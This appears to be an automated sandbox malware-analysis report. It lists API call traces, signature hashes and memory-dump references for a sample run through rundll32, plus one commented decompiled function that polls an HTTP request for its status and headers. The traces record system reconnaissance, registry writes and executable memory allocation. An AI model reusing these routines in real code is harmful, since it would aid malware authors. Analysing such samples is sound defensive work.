                                            Yara matches
                                            Similarity
                                            • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                            • String ID:
                                            • API String ID: 2937943280-0
                                            • Opcode ID: 1318eb4ff15344f80aa0a34261e7cc0a590fb12388465630b59c62a15043b07a
                                            • Instruction ID: 601602c844192962e6a8176f89f765d291289e834bed506154ce7efd46104026
                                            • Opcode Fuzzy Hash: 1318eb4ff15344f80aa0a34261e7cc0a590fb12388465630b59c62a15043b07a
                                            • Instruction Fuzzy Hash: 1E414B71A00209AFDB14DF99DC88EAEBBFCEF48209B108055FD19D3250EA31EE05CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 0581FFCF
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0581FFE2
                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 0581FFF4
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,05806BDA), ref: 05820018
                                            • GetComputerNameW.KERNEL32(00000000,?), ref: 05820026
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0582003D
                                            • GetComputerNameW.KERNEL32(00000000,?), ref: 0582004E
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,05806BDA), ref: 05820074
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapName$AllocateComputerFreeUser
                                            • String ID:
                                            • API String ID: 3239747167-0
                                            • Opcode ID: 4c66fcd0e111f0020880f9b9f7472f6e3930b31797eefe9803895ef806556a70
                                            • Instruction ID: 3279fc4978d1ff523590bf66b8cb39d95cf8ce92042e87d58aa5da11ded2646b
                                            • Opcode Fuzzy Hash: 4c66fcd0e111f0020880f9b9f7472f6e3930b31797eefe9803895ef806556a70
                                            • Instruction Fuzzy Hash: E931CDB6A10209EFDB10DFB5DD898AEBFF9FB44210B148469FD06D3210EB34AD859B51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,05801036,?,?,?,?), ref: 0581639C
                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 058163AE
                                            • wcstombs.NTDLL ref: 058163BC
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,05801036,?,?,?), ref: 058163E0
                                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 058163F5
                                            • mbstowcs.NTDLL ref: 05816402
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,05801036,?,?,?,?,?), ref: 05816414
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,05801036,?,?,?,?,?), ref: 0581642E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                            • String ID:
                                            • API String ID: 316328430-0
                                            • Opcode ID: fab88e454f1392000edd195c7c54b67e1ae1bbe34b9bbc789cc8d05be06d3c77
                                            • Instruction ID: b4ed5c809406d5252e3a015357c17cce8ec06c77062ec7140b1b0be26b89833c
                                            • Opcode Fuzzy Hash: fab88e454f1392000edd195c7c54b67e1ae1bbe34b9bbc789cc8d05be06d3c77
                                            • Instruction Fuzzy Hash: 93213D31510209FBDF219FA5EC49E9A7F79FB44315F108026FE06A2060EB71A9A4DB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(0581C387,00000000,00000000,05829460,?,?,05811B32,0581C387,00000000,0581C387,05829440), ref: 05807587
                                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 05807595
                                            • wsprintfA.USER32 ref: 058075B1
                                            • RegCreateKeyA.ADVAPI32(80000001,05829440,00000000), ref: 058075C9
                                            • lstrlen.KERNEL32(?), ref: 058075D8
                                            • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 058075E6
                                            • RegCloseKey.ADVAPI32(?), ref: 058075F1
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05807600
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                                            • String ID:
                                            • API String ID: 1575615994-0
                                            • Opcode ID: b363ddfa91abbe012bfd585ab4fbc44dd526efe35899621d06062ea8caeff823
                                            • Instruction ID: 830f6f0bf3385aca805181d2413badbe07e74123cdc93ec4f1d734cc5273f9af
                                            • Opcode Fuzzy Hash: b363ddfa91abbe012bfd585ab4fbc44dd526efe35899621d06062ea8caeff823
                                            • Instruction Fuzzy Hash: A8111B72110208BFEF215B95EC8AEAA3F7DEB48724F108025FE05D6160DA72AD959B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0581CDAF
                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0581CDCD
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0581CDD5
                                            • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0581CDF3
                                            • GetLastError.KERNEL32 ref: 0581CE07
                                            • RegCloseKey.ADVAPI32(?), ref: 0581CE12
                                            • CloseHandle.KERNEL32(00000000), ref: 0581CE19
                                            • GetLastError.KERNEL32 ref: 0581CE21
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                            • String ID:
                                            • API String ID: 3822162776-0
                                            • Opcode ID: 3420a96aa0af44e72f97df1df50eb0d4f2d29ac9d5efd97a878154ef41d1b094
                                            • Instruction ID: e68366ff8199262bbfe8d90e48dff54e8642c57bdc9b7e4a9448935bfdbe0a60
                                            • Opcode Fuzzy Hash: 3420a96aa0af44e72f97df1df50eb0d4f2d29ac9d5efd97a878154ef41d1b094
                                            • Instruction Fuzzy Hash: CE113C76190248BBEB219FA1D849E6A3FADFB44265F008014FE16C5250DF31DD64CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 8a1a3200f64cbf1f6661d54b7c592a23b2982ee01e8bdea36e94e61fdfd29f6b
                                            • Instruction ID: cfd795b0dc0713ecf6fc6c17bb10695dd75a13a2bdf855d2bdef913d6bd9eb24
                                            • Opcode Fuzzy Hash: 8a1a3200f64cbf1f6661d54b7c592a23b2982ee01e8bdea36e94e61fdfd29f6b
                                            • Instruction Fuzzy Hash: E2B1F071900219EFDF22AB95CC09AAEBBB9BF05314F048065ED11B7160D731AE85DF59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetCommandLineA.KERNEL32(058250F8,00000038,0581600B,00000000,76CDF5B0,0581339A,?,00000001,?,?,?,?,?,?,?,0580BF69), ref: 05814ADB
                                            • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05814AEC
                                              • Part of subcall function 05803997: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0581780A,?), ref: 058039A0
                                              • Part of subcall function 05803997: memcpy.NTDLL(00000000,?,00000000,?), ref: 058039C3
                                              • Part of subcall function 05803997: memset.NTDLL ref: 058039D2
                                            • ExitProcess.KERNEL32 ref: 05814CCE
                                              • Part of subcall function 058152C3: StrChrA.SHLWAPI(?,?,765BD3B0,05D7C304,00000000,?,0580CE0C,?,00000020,05D7C304), ref: 058152E8
                                              • Part of subcall function 058152C3: StrTrimA.SHLWAPI(?,05824FC4,00000000,?,0580CE0C,?,00000020,05D7C304), ref: 05815307
                                              • Part of subcall function 058152C3: StrChrA.SHLWAPI(?,?,?,0580CE0C,?,00000020,05D7C304), ref: 05815313
                                            • lstrcmp.KERNEL32(?,?), ref: 05814B5A
                                            • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,0580BF69,?), ref: 05814B72
                                              • Part of subcall function 05819287: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,05D7B7F0,?,?,0581BB0E,0000003A,05D7B7F0,?,?,?,05806B9D,00000001,00000000), ref: 058192C7
                                              • Part of subcall function 05819287: CloseHandle.KERNEL32(000000FF,?,?,0581BB0E,0000003A,05D7B7F0,?,?,?,05806B9D,00000001,00000000,?), ref: 058192D2
                                            • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,0580BF69,?), ref: 05814BE4
                                            • lstrcmp.KERNEL32(?,?), ref: 05814BFD
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 739714153-0
                                            • Opcode ID: 0f94e1e52549bfc9f57ad6b33989fe1f5101bf2e881d5322e66aeb65cc37aa50
                                            • Instruction ID: a2907718aacdfcc1fee68e7a4a438e5ebf29e9d75734f8fa53e363c74146940a
                                            • Opcode Fuzzy Hash: 0f94e1e52549bfc9f57ad6b33989fe1f5101bf2e881d5322e66aeb65cc37aa50
                                            • Instruction Fuzzy Hash: EF514971A10219AFDF20ABA4CC49EAEBFBDBF08705F044525FD01E61A0DB35AD45CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 058046B2
                                            • StrTrimA.SHLWAPI(00000000,?), ref: 058046CF
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05804702
                                            • RtlImageNtHeader.NTDLL(00000000), ref: 0580472B
                                            • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,00000000), ref: 058047F0
                                              • Part of subcall function 05803997: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0581780A,?), ref: 058039A0
                                              • Part of subcall function 05803997: memcpy.NTDLL(00000000,?,00000000,?), ref: 058039C3
                                              • Part of subcall function 05803997: memset.NTDLL ref: 058039D2
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 058047A1
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 058047D0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                            • String ID:
                                            • API String ID: 239510280-0
                                            • Opcode ID: 934755fcb30068f87f163c34b5e92d9afe74d50417073d61a633da3fc0e02b88
                                            • Instruction ID: 80fc7301836c60c8c4ee00b79daac2f5b42e2fc3e00c15b9bddb48e92c1351f2
                                            • Opcode Fuzzy Hash: 934755fcb30068f87f163c34b5e92d9afe74d50417073d61a633da3fc0e02b88
                                            • Instruction Fuzzy Hash: 6741C031250209BBEF629AA8DC89FBE3EB9EB45750F104025FE06E61E0DF719D808B55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(00000000,?,?,00000000,773C4620,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B529
                                            • lstrlen.KERNEL32(?,?,?,00000000,773C4620,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B547
                                            • RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0581B573
                                            • memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B58A
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0581B59D
                                            • memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,058163D9,?,?,?,?,?,00000000), ref: 0581B5AC
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,773C4620,?,00000001,00000001,?,058163D9,?,?,?), ref: 0581B610
                                              • Part of subcall function 05801924: RtlLeaveCriticalSection.NTDLL(?), ref: 058019A1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                            • String ID:
                                            • API String ID: 1635816815-0
                                            • Opcode ID: 8375a0b15e52af6083a9f569cc00b59c950e9fb1ac900334d8c40dcd3098d237
                                            • Instruction ID: d10d575b10e63868faa427ad29114d9d233630013c629b48029769c00efcb901
                                            • Opcode Fuzzy Hash: 8375a0b15e52af6083a9f569cc00b59c950e9fb1ac900334d8c40dcd3098d237
                                            • Instruction Fuzzy Hash: CD415E31600218ABDF219FA8DC88AEEBFA9FF04351F018565FD06E7160DB709E90DB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 0580EF84
                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 0580EFB2
                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0580EFF7
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0580F01F
                                            • _strupr.NTDLL ref: 0580F04A
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0580F057
                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0580F071
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                                            • String ID:
                                            • API String ID: 3831658075-0
                                            • Opcode ID: a1f0303710ad42d3ce23aad7b96303850f1bf5c0f3ba19b6d86fe51ad140a4cb
                                            • Instruction ID: cb8b487923e33f8536da752afb76004d68271e4ba68b07caf990f1d10e403f05
                                            • Opcode Fuzzy Hash: a1f0303710ad42d3ce23aad7b96303850f1bf5c0f3ba19b6d86fe51ad140a4cb
                                            • Instruction Fuzzy Hash: 8F410671904218AFDF719BA4CC49BEEBFB9BF48701F148456EA02E2190DB749A84DF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlImageNtHeader.NTDLL ref: 05814F8D
                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 05814FD0
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05814FEB
                                            • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 05815041
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 0581509D
                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 058150AB
                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 058150B6
                                              • Part of subcall function 05802F6E: RegCreateKeyA.ADVAPI32(80000001,?,-00000005), ref: 05802F82
                                              • Part of subcall function 05802F6E: memcpy.NTDLL(00000000,00000001,-00000005,-00000005,-00000005,?,05801B3D,?,00000000,-00000005,00000001), ref: 05802FAB
                                              • Part of subcall function 05802F6E: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,-00000005), ref: 05802FD4
                                              • Part of subcall function 05802F6E: RegCloseKey.ADVAPI32(-00000005,?,05801B3D,?,00000000,-00000005,00000001), ref: 05802FFF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                                            • String ID:
                                            • API String ID: 3181710096-0
                                            • Opcode ID: 2cd1f515f63d77c50cfed68abfd3865903a67c50c1cdfffbbeab566e0d28250d
                                            • Instruction ID: 6c409873daa773a12002a2a463845e0a147f2f3ba556e04204b3cffb1438ebe4
                                            • Opcode Fuzzy Hash: 2cd1f515f63d77c50cfed68abfd3865903a67c50c1cdfffbbeab566e0d28250d
                                            • Instruction Fuzzy Hash: 80417C72210205ABEF319EA5D88AF6A3FADFB80751F048024FD06D6150DB71ED85CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • InterlockedIncrement.KERNEL32(0582908C), ref: 05807E57
                                            • lstrcpy.KERNEL32(00000000), ref: 05807E93
                                              • Part of subcall function 0580ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0581A2DC,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0580AE07
                                              • Part of subcall function 0580ADF8: mbstowcs.NTDLL ref: 0580AE23
                                            • GetLastError.KERNEL32(00000000), ref: 05807F22
                                            • HeapFree.KERNEL32(00000000,?), ref: 05807F39
                                            • InterlockedDecrement.KERNEL32(0582908C), ref: 05807F50
                                            • DeleteFileA.KERNEL32(00000000), ref: 05807F71
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05807F81
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                                            • String ID:
                                            • API String ID: 908044853-0
                                            • Opcode ID: 4059644207bfe74917fd405bbaf39e95fd563ce8ec8d6d48f5c4dfebc601e235
                                            • Instruction ID: 485f1c0c710050b2021bb9dd66393ce3cad8d94e5c1dd5d18611a574c55c1053
                                            • Opcode Fuzzy Hash: 4059644207bfe74917fd405bbaf39e95fd563ce8ec8d6d48f5c4dfebc601e235
                                            • Instruction Fuzzy Hash: 4B312732A00218FBCF609FA4DC48AAD7EB5EF04750F119064FD05E7180DB30AE82CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                            • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 0580423D
                                            • StrTrimA.SHLWAPI(?,?), ref: 0580425B
                                            • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 058042C4
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 058042E5
                                            • DeleteFileA.KERNEL32(?,00003219), ref: 05804307
                                            • HeapFree.KERNEL32(00000000,?), ref: 05804316
                                            • HeapFree.KERNEL32(00000000,?,00003219), ref: 0580432E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                            • String ID:
                                            • API String ID: 1078934163-0
                                            • Opcode ID: bb32e65cf1cc29e42bc0200b43cfec6eebece58ec50f846e8e118b43e0e52e47
                                            • Instruction ID: b61ca97135eb2a9f0192c5115caa14545e19937c3e03b7ce0cef1911007dc12c
                                            • Opcode Fuzzy Hash: bb32e65cf1cc29e42bc0200b43cfec6eebece58ec50f846e8e118b43e0e52e47
                                            • Instruction Fuzzy Hash: 6231DF32244205AFEA20EB95DC05FAA7FE8FF58710F054415FE40D71A0DB65ED458BA6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,0581043C,00000000), ref: 05810162
                                            • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 05810177
                                            • memset.NTDLL ref: 05810184
                                            • HeapFree.KERNEL32(00000000,00000000,?,0581043B,?,?,00000000,?,00000000,05817364,?,00000000), ref: 058101A1
                                            • memcpy.NTDLL(?,?,0581043B,?,0581043B,?,?,00000000,?,00000000,05817364,?,00000000), ref: 058101C2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Allocate$Freememcpymemset
                                            • String ID: chun
                                            • API String ID: 2362494589-3058818181
                                            • Opcode ID: 94b7d14d72e19b264be23349b10aee78458f400a798fea02e8848b57495c5e37
                                            • Instruction ID: a0d898ba848bdde6d0d7571f7f24406e2939a2ec0f18d5d771bfa9a14da5f70a
                                            • Opcode Fuzzy Hash: 94b7d14d72e19b264be23349b10aee78458f400a798fea02e8848b57495c5e37
                                            • Instruction Fuzzy Hash: 6B314771200706EFEB319B65DC48A66BBEDAF14310F00842AED4ACB260DB70F985CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                             			E049F5F21(void* __ecx, void* __esi) { // __esi = request context: +0x18 HINTERNET request, +0x1c completion event, +0x28 error code set by the completion path, +0x2c status code, +0xc raw headers
                                             				long _v8;
                                             				long _v12;
                                             				long _v16;
                                             				long _v20;
                                             				long _t34;
                                             				long _t39;
                                             				long _t42;
                                             				long _t56;
                                             				void* _t58;
                                             				void* _t59;
                                             				void* _t61;
                                             
                                             				_t61 = __esi;
                                             				_t59 = __ecx;
                                             				 *((intOrPtr*)(__esi + 0x2c)) = 0; // clear the status-code slot before querying
                                             				do {
                                             					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0); // non-blocking poll of the completion event
                                             					_v20 = _t34;
                                             					if(_t34 != 0) { // event not signalled yet: attempt the query anyway
                                             						L3:
                                             						_v8 = 4; // sizeof(DWORD)
                                             						_v16 = 0;
                                             						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) { // 0x20000013 = HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER: status code as a DWORD into +0x2c
                                             							_t39 = GetLastError();
                                             							_v12 = _t39;
                                             							if(_v20 == 0 || _t39 != 0x2ef3) { // 0x2ef3 = 12019 = ERROR_INTERNET_INCORRECT_HANDLE_STATE (response not in yet); any other error, or an already-signalled event, is final
                                             								L15:
                                             								return _v12;
                                             							} else {
                                             								goto L11; // wait and retry
                                             							}
                                             						}
                                             						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) { // no usable status code yet
                                             							goto L11;
                                             						} else {
                                             							_v16 = 0;
                                             							_v8 = 0;
                                             							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16); // 0x16 = HTTP_QUERY_RAW_HEADERS_CRLF; sizing call with a NULL buffer leaves the required length in _v8
                                             							_t58 = E049F4DF6(_v8 + 1); // allocator helper: length + 1 for the terminating NUL, returns 0 on failure
                                             							if(_t58 == 0) {
                                             								_v12 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                             							} else {
                                             								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) { // second call fills the buffer with the raw response headers
                                             									E049F4C73(_t58); // free the buffer (RtlFreeHeap, see the subcall list below)
                                             									_v12 = GetLastError();
                                             								} else {
                                             									 *((char*)(_t58 + _v8)) = 0; // NUL-terminate
                                             									 *(_t61 + 0xc) = _t58; // keep the header block in the context for the caller
                                             								}
                                             							}
                                             							goto L15;
                                             						}
                                             					}
                                             					SetEvent( *(_t61 + 0x1c)); // event was signalled: set it again so it stays signalled
                                             					_t56 =  *((intOrPtr*)(_t61 + 0x28)); // error code recorded when the request completed
                                             					_v12 = _t56;
                                             					if(_t56 != 0) {
                                             						goto L15; // request failed asynchronously
                                             					}
                                             					goto L3;
                                             					L11:
                                             					_t42 = E049F3A6F( *(_t61 + 0x1c), _t59, 0xea60); // wait on the event for up to 0xea60 = 60000 ms (WaitForMultipleObjects, see the subcall list below); 0 means keep polling
                                             					_v12 = _t42;
                                             				} while (_t42 == 0);
                                             				goto L15;
                                             			}
                                             Statement addresses emitted with the decompiled code above, in source order:
                                             0x049f5f21 0x049f5f21 0x049f5f31 0x049f5f34 0x049f5f38 0x049f5f3e 0x049f5f43 0x049f5f5c
                                             0x049f5f70 0x049f5f77 0x049f5f7e 0x049f5fd1 0x049f5fd7 0x049f5fdd 0x049f6018 0x049f601e
                                             0x00000000 0x00000000 0x00000000 0x049f5fdd 0x049f5f84 0x00000000 0x049f5f8b 0x049f5f99
                                             0x049f5f9c 0x049f5f9f 0x049f5fab 0x049f5faf 0x049f6011 0x049f5fb1 0x049f5fc3 0x049f6001
                                             0x049f600c 0x049f5fc5 0x049f5fc8 0x049f5fcc 0x049f5fcc 0x049f5fc3 0x00000000 0x049f5faf
                                             0x049f5f84 0x049f5f48 0x049f5f4e 0x049f5f51 0x049f5f56 0x00000000 0x00000000 0x00000000
                                             0x049f5fe6 0x049f5fee 0x049f5ff3 0x049f5ff6 0x00000000

                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,76CC81D0), ref: 049F5F38
                                            • SetEvent.KERNEL32(?), ref: 049F5F48
                                            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 049F5F7A
                                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 049F5F9F
                                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 049F5FBF
                                            • GetLastError.KERNEL32 ref: 049F5FD1
                                              • Part of subcall function 049F3A6F: WaitForMultipleObjects.KERNEL32(00000002,049F7B35,00000000,049F7B35,?,?,?,049F7B35,0000EA60), ref: 049F3A8A
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            • GetLastError.KERNEL32(00000000), ref: 049F6006
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
